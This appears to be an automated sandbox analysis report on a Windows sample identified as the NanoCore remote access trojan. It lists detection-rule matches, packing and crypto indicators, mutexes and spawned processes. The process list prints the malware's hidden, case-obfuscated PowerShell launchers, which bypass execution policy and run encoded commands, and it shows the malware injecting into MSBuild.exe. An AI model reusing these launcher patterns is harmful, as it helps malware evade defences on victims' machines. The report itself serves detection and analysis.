Source: 15.2.MSBuild.exe.51b0000.3.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 15.2.MSBuild.exe.51b0000.3.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.2.MSBuild.exe.51b0000.3.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 15.2.MSBuild.exe.51b0000.3.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.2.MSBuild.exe.5400000.11.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 15.2.MSBuild.exe.5400000.11.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.2.MSBuild.exe.61d0000.17.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 15.2.MSBuild.exe.61d0000.17.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.2.MSBuild.exe.53c0000.7.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 15.2.MSBuild.exe.53c0000.7.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.2.MSBuild.exe.5cc0000.15.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 15.2.MSBuild.exe.5cc0000.15.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.2.MSBuild.exe.61d0000.17.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 15.2.MSBuild.exe.61d0000.17.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.2.MSBuild.exe.5cd0000.16.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 15.2.MSBuild.exe.5cd0000.16.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.2.MSBuild.exe.5370000.5.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 15.2.MSBuild.exe.5370000.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.2.MSBuild.exe.53b0000.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 15.2.MSBuild.exe.53b0000.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.2.MSBuild.exe.51c0000.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 15.2.MSBuild.exe.51c0000.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.2.MSBuild.exe.5cc0000.15.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 15.2.MSBuild.exe.5cc0000.15.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.2.MSBuild.exe.5ca0000.14.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 15.2.MSBuild.exe.5ca0000.14.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.2.MSBuild.exe.5ca0000.14.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 15.2.MSBuild.exe.5ca0000.14.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.2.MSBuild.exe.5400000.11.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 15.2.MSBuild.exe.5400000.11.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 15.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0.0.GgNhpv.exe.2d0000.0.unpack, type: UNPACKEDPEMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 15.2.MSBuild.exe.51c0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 15.2.MSBuild.exe.51c0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 30.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 30.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 30.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 15.2.MSBuild.exe.5cd0000.16.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 15.2.MSBuild.exe.5cd0000.16.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.GgNhpv.exe.2d0000.0.unpack, type: UNPACKEDPEMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
PE file has an executable .text section which is very likely to contain packed code (zlib compression ratio < 0.3)
Source: GgNhpv.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.NET source code contains calls to encryption/decryption functions
Source: 15.2.MSBuild.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 15.2.MSBuild.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 15.2.MSBuild.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs | Cryptographic APIs: 'TransformFinalBlock'
Binary contains paths to development resources
Source: wpasv.exe, 00000010.00000002.989106106.0000000003270000.00000004.00000001.sdmp, wpasv.exe, 00000012.00000002.1016646289.0000000002C20000.00000004.00000001.sdmp | Binary or memory string: *.slnT#Nl
Source: wpasv.exe, 00000010.00000002.989106106.0000000003270000.00000004.00000001.sdmp, wpasv.exe, 00000012.00000002.1016646289.0000000002C20000.00000004.00000001.sdmp | Binary or memory string: LlUC:\Users\user\AppData\Roaming\59407D34-C8C5-44DF-A766-BA8A11CB1CB0\WPA Service\*.sln
Source: wpasv.exe, 00000010.00000002.987382069.0000000000EB2000.00000002.00020000.sdmp, wpasv.exe, 00000012.00000000.1010762421.0000000000822000.00000002.00020000.sdmp, wpasv.exe.15.dr | Binary or memory string: .configAMSBUILDDIRECTORYDELETERETRYCOUNTCMSBUILDDIRECTORYDELETRETRYTIMEOUT.sln
Source: wpasv.exe, 00000010.00000002.987382069.0000000000EB2000.00000002.00020000.sdmp, wpasv.exe, 00000012.00000000.1010762421.0000000000822000.00000002.00020000.sdmp, wpasv.exe.15.dr | Binary or memory string: MSBuild MyApp.sln /t:Rebuild /p:Configuration=Release
Source: wpasv.exe, wpasv.exe.15.dr | Binary or memory string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb
Source: wpasv.exe, 00000010.00000002.987382069.0000000000EB2000.00000002.00020000.sdmp, wpasv.exe, 00000012.00000000.1010762421.0000000000822000.00000002.00020000.sdmp, wpasv.exe.15.dr | Binary or memory string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdbD
Source: wpasv.exe, wpasv.exe.15.dr | Binary or memory string: *.sln
Source: wpasv.exe, 00000010.00000002.987382069.0000000000EB2000.00000002.00020000.sdmp, wpasv.exe, 00000012.00000000.1010762421.0000000000822000.00000002.00020000.sdmp, wpasv.exe.15.dr | Binary or memory string: MSBuild MyApp.csproj /t:Clean
Source: wpasv.exe, 00000010.00000002.987382069.0000000000EB2000.00000002.00020000.sdmp, wpasv.exe, 00000012.00000000.1010762421.0000000000822000.00000002.00020000.sdmp, wpasv.exe.15.dr | Binary or memory string: /ignoreprojectextensions:.sln
Source: wpasv.exe, 00000010.00000002.987382069.0000000000EB2000.00000002.00020000.sdmp, wpasv.exe, 00000012.00000000.1010762421.0000000000822000.00000002.00020000.sdmp, wpasv.exe.15.dr | Binary or memory string: MSBUILD : error MSB1048: Solution files cannot be debugged directly. Run MSBuild first with an environment variable MSBUILDEMITSOLUTION=1 to create a corresponding ".sln.metaproj" file. Then debug that.
Classification label
Source: classification engine | Classification label: mal100.troj.evad.winEXE@37/43@6/3
Creates files inside the user directory
Source: C:\Users\user\Desktop\GgNhpv.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\GgNhpv.exe.log
Creates mutexes
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:744:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3988:120:WilError_01
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\{9470f20e-e20d-41ee-b53a-fa80f071eb91}
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4888:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1044:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4188:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2680:120:WilError_01
Creates temporary files
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_prtsbvfc.nov.ps1
PE file has an executable .text section and no other executable section
Source: GgNhpv.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Parts of this application are using the .NET runtime (probably coded in C#)
Source: C:\Users\user\Desktop\GgNhpv.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b818384f6f636b55ba6f5af0c6a7784d\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b818384f6f636b55ba6f5af0c6a7784d\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b818384f6f636b55ba6f5af0c6a7784d\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b818384f6f636b55ba6f5af0c6a7784d\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b818384f6f636b55ba6f5af0c6a7784d\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\5e7364da399b604ae01baff696551080\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\59407D34-C8C5-44DF-A766-BA8A11CB1CB0\WPA Service\wpasv.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\5e7364da399b604ae01baff696551080\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\59407D34-C8C5-44DF-A766-BA8A11CB1CB0\WPA Service\wpasv.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\5e7364da399b604ae01baff696551080\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b818384f6f636b55ba6f5af0c6a7784d\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b818384f6f636b55ba6f5af0c6a7784d\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b818384f6f636b55ba6f5af0c6a7784d\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b818384f6f636b55ba6f5af0c6a7784d\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\5e7364da399b604ae01baff696551080\mscorlib.ni.dll
Reads software policies
Source: C:\Users\user\Desktop\GgNhpv.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Reads the hosts file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Windows\System32\drivers\etc\hosts
Sample reads its own file content
Source: C:\Users\user\Desktop\GgNhpv.exe | File read: C:\Users\user\Desktop\GgNhpv.exe:Zone.Identifier
Spawns processes
Source: unknown | Process created: C:\Users\user\Desktop\GgNhpv.exe 'C:\Users\user\Desktop\GgNhpv.exe'
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -windowstyle hidden -ExecutionPolicy Bypass PowERsHELl.`ExE -ExecutionPolicy bypass /e [base64-encoded command omitted]
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy bypass /e 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
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Ep ByPass -win 1 /noP -nolOgO -noNinteRacTi $check=Get-Process output -ErrorAction SilentlyContinue;if ($check -eq $null) { Powershell.exe -eP BYPasS /nOp -nolOgO -win 1 -noNinteRacTi /e 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; }else{ exit;}
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Ep ByPass -win 1 /noP -nolOgO -noNinteRacTi $check=Get-Process output -ErrorAction SilentlyContinue;if ($check -eq $null) { Powershell.exe -eP BYPasS /nOp -nolOgO -win 1 -noNinteRacTi /e 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; }else{ exit;}
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -eP BYPasS /nOp -nolOgO -win 1 -noNinteRacTi /e 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
Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe {path}
Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe {path}
Source: unknown | Process created: C:\Users\user\AppData\Roaming\59407D34-C8C5-44DF-A766-BA8A11CB1CB0\WPA Service\wpasv.exe 'C:\Users\user\AppData\Roaming\59407D34-C8C5-44DF-A766-BA8A11CB1CB0\WPA Service\wpasv.exe'
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Users\user\AppData\Roaming\59407D34-C8C5-44DF-A766-BA8A11CB1CB0\WPA Service\wpasv.exe 'C:\Users\user\AppData\Roaming\59407D34-C8C5-44DF-A766-BA8A11CB1CB0\WPA Service\wpasv.exe'
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -windowstyle hidden -ExecutionPolicy Bypass PowERsHELl.`ExE -ExecutionPolicy bypass /e [base64-encoded command omitted]
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy bypass /e 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
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Ep ByPass -win 1 /noP -nolOgO -noNinteRacTi $check=Get-Process output -ErrorAction SilentlyContinue;if ($check -eq $null) { Powershell.exe -eP BYPasS /nOp -nolOgO -win 1 -noNinteRacTi /e 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; }else{ exit;}
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Ep ByPass -win 1 /noP -nolOgO -noNinteRacTi $check=Get-Process output -ErrorAction SilentlyContinue;if ($check -eq $null) { Powershell.exe -eP BYPasS /nOp -nolOgO -win 1 -noNinteRacTi /e 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; }else{ exit;}
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -eP BYPasS /nOp -nolOgO -win 1 -noNinteRacTi /e [base64-encoded command omitted]
Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe {path}
Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe {path}
Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe {path}
Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe {path}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy bypass /e 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
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Ep ByPass -win 1 /noP -nolOgO -noNinteRacTi $check=Get-Process output -ErrorAction SilentlyContinue;if ($check -eq $null) { Powershell.exe -eP BYPasS /nOp -nolOgO -win 1 -noNinteRacTi /e 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; }else{ exit;}
